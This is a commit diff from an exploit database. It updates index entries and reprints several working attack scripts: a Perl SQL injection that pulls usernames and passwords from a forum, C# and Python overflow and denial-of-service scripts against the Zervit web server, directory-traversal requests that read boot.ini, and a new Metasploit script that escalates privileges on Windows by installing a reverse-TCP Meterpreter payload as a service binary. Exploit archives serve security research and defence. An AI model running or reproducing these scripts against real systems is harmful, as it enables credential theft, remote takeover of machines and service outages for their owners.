DB: 2016-03-09

1 new exploits
This commit is contained in:
Offensive Security 2016-03-09 05:02:46 +00:00
parent 4cae1b12fc
commit a7c11413af
8 changed files with 388 additions and 269 deletions

View file

@ -2411,7 +2411,7 @@ id,file,description,date,author,platform,type,port
2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0
2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0
2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0
2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0
2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0
2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability",2006-11-06,the_day,php,webapps,0
@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port
8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0
8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0
8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0
8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0
8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-16,Dns-Team,php,webapps,0
8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling Vulnerability",2009-04-16,ZoRLu,php,webapps,0
@ -7970,7 +7970,7 @@ id,file,description,date,author,platform,type,port
8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0
8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 (Login Bypass) SQL Injection Vulnerability",2009-04-16,tmh,php,webapps,0
8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0
8463,platforms/windows/remote/8463.txt,"Zervit Webserver 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 (Auth Bypass) SQL Injection Vulnerability",2009-04-17,"Salvatore Fresta",php,webapps,0
8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit",2009-04-17,"Code Audit Labs",windows,dos,0
8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0
@ -8007,7 +8007,7 @@ id,file,description,date,author,platform,type,port
8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln",2009-04-20,"Salvatore Fresta",php,webapps,0
8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0
8500,platforms/windows/dos/8500.py,"Zervit Webserver 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0
8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (LFI/SQL) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0
8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 (include) Local File Inclusion Vulnerability",2009-04-21,SirGod,php,webapps,0
@ -8029,7 +8029,7 @@ id,file,description,date,author,platform,type,port
8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0
8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0
8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0
8522,platforms/windows/dos/8522.pl,"Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
8522,platforms/windows/dos/8522.pl,"Zervit Web Server <= 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0
8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0
@ -8171,7 +8171,7 @@ id,file,description,date,author,platform,type,port
8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0
8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0
8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment - JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
8666,platforms/windows/remote/8666.txt,"zervit webserver 0.4 - Directory Traversal / memory corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0
8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0
8669,platforms/multiple/dos/8669.c,"ipsec-tools racoon frag-isakmp Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0
@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port
8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability",2009-05-18,Mi4night,php,webapps,0
8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0
@ -10279,7 +10279,7 @@ id,file,description,date,author,platform,type,port
11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0
11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0
11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0
11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring - Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0
11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0
11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0
11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0
11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0
@ -10329,7 +10329,7 @@ id,file,description,date,author,platform,type,port
11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0
11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0
11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec Remote files",2010-01-26,"Nikoal Petrov",php,webapps,0
11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit SEH",2010-01-26,TecR0c,windows,local,0
@ -11483,8 +11483,8 @@ id,file,description,date,author,platform,type,port
12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0
12579,platforms/php/webapps/12579.txt,"Joomla Custom PHP Pages Component com_php LFI Vulnerability",2010-05-12,"Chip d3 bi0s",php,webapps,0
12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0
12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0

Can't render this file because it is too large.

View file

@ -1,48 +1,48 @@
#!perl
use IO::Socket;
#Download:http://www.thewebdrivers.com/forum.zip
#By:Bl0od3r
#Germany =]
if (@ARGV<3) {
&header;
} else {
&get();
}
sub get() {
$host=$ARGV[0];
$path=$ARGV[1];
$id=$ARGV[2];
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
or die ("[-]Error\n");
print "[~]Connecting!\n";
print "[~]Getting Data!\n";
print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($ans=<$socket>) {
$ans=~ m/<span class="style3">&nbsp;Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:";
$ans=~ m/<td class=\"text\">(.*?)<\/td>/ && print "$1\n";
if ($1) {
$success=1; } else { $success=0;};
}
if ($success=="1") {
print "\n[+]Successed!";
} else {
print "[-]Error";
}
}
sub header() {
print
"--------------------------------------------------------------------\n";
print "|\t---------->By Bl0od3r<---------\t\t\t\t |";
print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |";
print
"\n--------------------------------------------------------------------\n";
exit;
}
# greetz to all dc3 members,matrix_killer and skOd =]
# milw0rm.com [2006-11-05]
#!perl
use IO::Socket;
#Download:http://www.thewebdrivers.com/forum.zip
#By:Bl0od3r
#Germany =]
if (@ARGV<3) {
&header;
} else {
&get();
}
sub get() {
$host=$ARGV[0];
$path=$ARGV[1];
$id=$ARGV[2];
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
or die ("[-]Error\n");
print "[~]Connecting!\n";
print "[~]Getting Data!\n";
print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($ans=<$socket>) {
$ans=~ m/<span class="style3">&nbsp;Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:";
$ans=~ m/<td class=\"text\">(.*?)<\/td>/ && print "$1\n";
if ($1) {
$success=1; } else { $success=0;};
}
if ($success=="1") {
print "\n[+]Successed!";
} else {
print "[-]Error";
}
}
sub header() {
print
"--------------------------------------------------------------------\n";
print "|\t---------->By Bl0od3r<---------\t\t\t\t |";
print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |";
print
"\n--------------------------------------------------------------------\n";
exit;
}
# greetz to all dc3 members,matrix_killer and skOd =]
# milw0rm.com [2006-11-05]

View file

@ -1,50 +1,50 @@
#################### Zervit Webserver 0.02 Buffer Overflow ############################
############### By: e.wiZz!
###############Site: www.balcansecurity.com
############### Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
########################################################################################
######Vend0r site: http://www.ohloh.net/projects/mereo
/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */
using System;
using System.IO;
using System.Net;
using System.Text;
class whatsoever
{
static void Main()
{
// StringBuilder sb = new StringBuilder();
//byte[] buf = new byte[8192];
Console.WriteLine("Enter site: (http://localhost)");
string sajt = Console.ReadLine();
string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
HttpWebRequest request = (HttpWebRequest)
WebRequest.Create(sajt+uribad);
HttpWebResponse response = (HttpWebResponse)
request.GetResponse();
// you shouldn't see response
Console.WriteLine(sb.ToString());
}
}
// milw0rm.com [2009-04-15]
#################### Zervit Webserver 0.02 Buffer Overflow ############################
############### By: e.wiZz!
###############Site: www.balcansecurity.com
############### Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
########################################################################################
######Vend0r site: http://www.ohloh.net/projects/mereo
/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */
using System;
using System.IO;
using System.Net;
using System.Text;
class whatsoever
{
static void Main()
{
// StringBuilder sb = new StringBuilder();
//byte[] buf = new byte[8192];
Console.WriteLine("Enter site: (http://localhost)");
string sajt = Console.ReadLine();
string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
HttpWebRequest request = (HttpWebRequest)
WebRequest.Create(sajt+uribad);
HttpWebResponse response = (HttpWebResponse)
request.GetResponse();
// you shouldn't see response
Console.WriteLine(sb.ToString());
}
}
// milw0rm.com [2009-04-15]

View file

@ -1,31 +1,31 @@
import socket
import sys
print "------------------------------------------------------"
print " Zervit Webserver 0.3 Remote Denial Of Service "
print " url: http://zervit.sourceforge.net "
print " "
print " author: shinnai "
print " mail: shinnai[at]autistici[dot]org "
print " site: http://www.shinnai.net "
print " "
print " greets to: e.wiZz! for inspiration. Be safe man... "
print " "
print " dedicated to: all those tried to own my site :-p "
print "------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
buff = "//.\\" * 330
request = "GET " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
raw_input('\n\nExploit completed. Press "Enter" to quit...')
sys.exit
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
# milw0rm.com [2009-04-21]
import socket
import sys
print "------------------------------------------------------"
print " Zervit Webserver 0.3 Remote Denial Of Service "
print " url: http://zervit.sourceforge.net "
print " "
print " author: shinnai "
print " mail: shinnai[at]autistici[dot]org "
print " site: http://www.shinnai.net "
print " "
print " greets to: e.wiZz! for inspiration. Be safe man... "
print " "
print " dedicated to: all those tried to own my site :-p "
print "------------------------------------------------------"
host = "127.0.0.1"
port = 80
try:
buff = "//.\\" * 330
request = "GET " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
raw_input('\n\nExploit completed. Press "Enter" to quit...')
sys.exit
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
# milw0rm.com [2009-04-21]

View file

@ -1,39 +1,39 @@
#!/usr/bin/perl
#
# Zervit HTTP Server <= v0.3 Remote Denial of Service.
#
# --------------------------------------------------------------------
# The vulnerability is caused due to an error in multi-socket.
# This can be exploited to crash the HTTP service.
# --------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan\n";
print "[+] Soft : Zervit 0.3 Remote DoS\n";
if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 80\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";
print $socket "GET \x11 HTTP/1.0\n\r\n";
}
# milw0rm.com [2009-04-22]
#!/usr/bin/perl
#
# Zervit HTTP Server <= v0.3 Remote Denial of Service.
#
# --------------------------------------------------------------------
# The vulnerability is caused due to an error in multi-socket.
# This can be exploited to crash the HTTP service.
# --------------------------------------------------------------------
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan\n";
print "[+] Soft : Zervit 0.3 Remote DoS\n";
if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 80\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
print "[+] Sending request...\n";
for($i=0;$i=4;$i++)
{
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";
print $socket "GET \x11 HTTP/1.0\n\r\n";
}
# milw0rm.com [2009-04-22]

119
platforms/windows/local/11264.rb Executable file
View file

@ -0,0 +1,119 @@
##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
#
# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
# Due to an empty security descriptor, a local attacker can gain elevated privileges.
# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
# Vulnerability mitigation featured.
#
# Credit:
# - Discovery - Nine:Situations:Group::bellick
# - Meterpreter script - Trancer
#
# References:
# - http://retrogod.altervista.org/9sg_south_river_priv.html
# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
# - http://osvdb.org/show/osvdb/59080
#
# mtrancer[@]gmail.com
# http://www.rec-sec.com
##
#
# Options
#
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "This help menu"],
"-m" => [ false, "Mitigate"],
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
"-p" => [ true, "The port on the remote host where Metasploit is listening"]
)
#
# Default parameters
#
rhost = Rex::Socket.source_address("1.2.3.4")
rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
print_line(opts.usage)
raise Rex::Script::Completed
when "-m"
client.sys.process.get_processes().each do |m|
if ( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Set correct service security descriptor to mitigate the vulnerability
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
end
end
raise Rex::Script::Completed
when "-r"
rhost = val
when "-p"
rport = val.to_i
end
end
client.sys.process.get_processes().each do |m|
if ( m['name'] == pname )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
# Stop the vulnerable service
print_status("Stopping service \"#{sname}\"...")
client.sys.process.execute("cmd.exe /c sc stop \"#{sname}\" ", nil, {'Hidden' => 'true'})
# Set exe payload as service binpath
print_status("Setting \"#{sname}\" to #{tempexe}...")
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
sleep(1)
# Restart the service
print_status("Restarting the \"#{sname}\" service...")
client.sys.process.execute("cmd.exe /c sc start \"#{sname}\" ", nil, {'Hidden' => 'true'})
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
# Set service binpath back to normal
client.sys.process.execute("cmd.exe /c sc config \"#{sname}\" binpath= %ProgramFiles%\\WebDrive\\#{pname}", nil, {'Hidden' => 'true'})
end
end

View file

@ -1,27 +1,27 @@
#################### Zervit Webserver Directory Traversal ############################
############### By: e.wiZz!
###############Site: www.balcansecurity.com
############### Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
########################################################################################
#Site: http://zervit.sourceforge.net/
#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings.
It is being developed thinking in the people that will make use of it and tries to make itself intuitive.
It aims to make file sharing or displaying a web easier than the current servers do.
#Vulnerability:
http://[site]/../../../../../../boot.ini
# milw0rm.com [2009-04-16]
#################### Zervit Webserver Directory Traversal ############################
############### By: e.wiZz!
###############Site: www.balcansecurity.com
############### Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
########################################################################################
#Site: http://zervit.sourceforge.net/
#Info: Zervit is the first compact, portable HTTP/Web Server made for human beings.
It is being developed thinking in the people that will make use of it and tries to make itself intuitive.
It aims to make file sharing or displaying a web easier than the current servers do.
#Vulnerability:
http://[site]/../../../../../../boot.ini
# milw0rm.com [2009-04-16]

View file

@ -1,63 +1,63 @@
####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########
By: e.wiZz! & shinnai
Site: shinnai.net & balcansecurity.com
[Memory Corruption]
########################################################################
import socket
host = "127.0.0.1"
port = 8080
try:
for i in range(1,10):
buff = "a" * 3330
request = "POST " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
[Directory traversal]
#################################################################################
[Request]
GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################
[Response]
HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################
# milw0rm.com [2009-05-13]
####################### Zervit webserver 0.4 Directory Traversal & Memory Corruption #########
By: e.wiZz! & shinnai
Site: shinnai.net & balcansecurity.com
[Memory Corruption]
########################################################################
import socket
host = "127.0.0.1"
port = 8080
try:
for i in range(1,10):
buff = "a" * 3330
request = "POST " + buff + " HTTP/1.0"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
except:
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
[Directory traversal]
#################################################################################
[Request]
GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################
[Response]
HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################
# milw0rm.com [2009-05-13]